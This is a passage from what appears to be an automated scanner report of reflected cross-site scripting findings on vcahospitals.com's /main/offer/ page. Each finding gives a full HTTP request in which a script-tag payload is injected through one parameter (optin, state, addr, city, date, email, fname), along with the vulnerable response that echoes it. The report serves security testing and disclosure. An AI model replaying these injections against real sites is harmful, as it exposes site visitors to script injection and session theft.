<form action="http://www.vcahospitals.com/main/offer/thank-you.html?=37a4ae"><script>alert(1)</script>6cab6f57fc7&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-fo
...[SNIP]...

2.54. http://www.vcahospitals.com/main/offer/ [&optin parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the &optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80fb4"><script>alert(1)</script>58eba80557c was submitted in the &optin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&optin=180fb4"><script>alert(1)</script>58eba80557c&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:06 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&optin=180fb4"><script>alert(1)</script>58eba80557c&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.55. http://www.vcahospitals.com/main/offer/ [&state parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the &state request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fc88"><script>alert(1)</script>a3145493564 was submitted in the &state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&state=FL3fc88"><script>alert(1)</script>a3145493564&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:59 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL3fc88"><script>alert(1)</script>a3145493564&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.56. http://www.vcahospitals.com/main/offer/ [addr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the addr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a42b0"><script>alert(1)</script>3f63bb4fc1f was submitted in the addr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=a42b0"><script>alert(1)</script>3f63bb4fc1f&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=7hsjo72anm75fuu66qlgrcdl51; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=a42b0"><script>alert(1)</script>3f63bb4fc1f&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2f
...[SNIP]...

2.57. http://www.vcahospitals.com/main/offer/ [city parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a762"><script>alert(1)</script>ca37e104d6b was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=2a762"><script>alert(1)</script>ca37e104d6b&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:00 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=fo15h1tlhcbbnb166klq5i4j61; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=2a762"><script>alert(1)</script>ca37e104d6b&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vc
...[SNIP]...

2.58. http://www.vcahospitals.com/main/offer/ [date parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the date request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67b79"><script>alert(1)</script>b01a5b3d5be was submitted in the date parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=130708440067b79"><script>alert(1)</script>b01a5b3d5be&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:04 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=imqt3ohs1kmrs8q3jmpiu4dts2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=130708440067b79"><script>alert(1)</script>b01a5b3d5be&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2
...[SNIP]...

2.59. http://www.vcahospitals.com/main/offer/ [email parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48e0"><script>alert(1)</script>069a700961f was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=d48e0"><script>alert(1)</script>069a700961f&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=1do3gpr45inrh2l3itveglepn0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=d48e0"><script>alert(1)</script>069a700961f&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2
...[SNIP]...

2.60. http://www.vcahospitals.com/main/offer/ [fname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/

Issue detail

The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c53f7"><script>alert(1)</script>b1eee91948e was submitted in the fname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=c53f7"><script>alert(1)</script>b1eee91948e&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
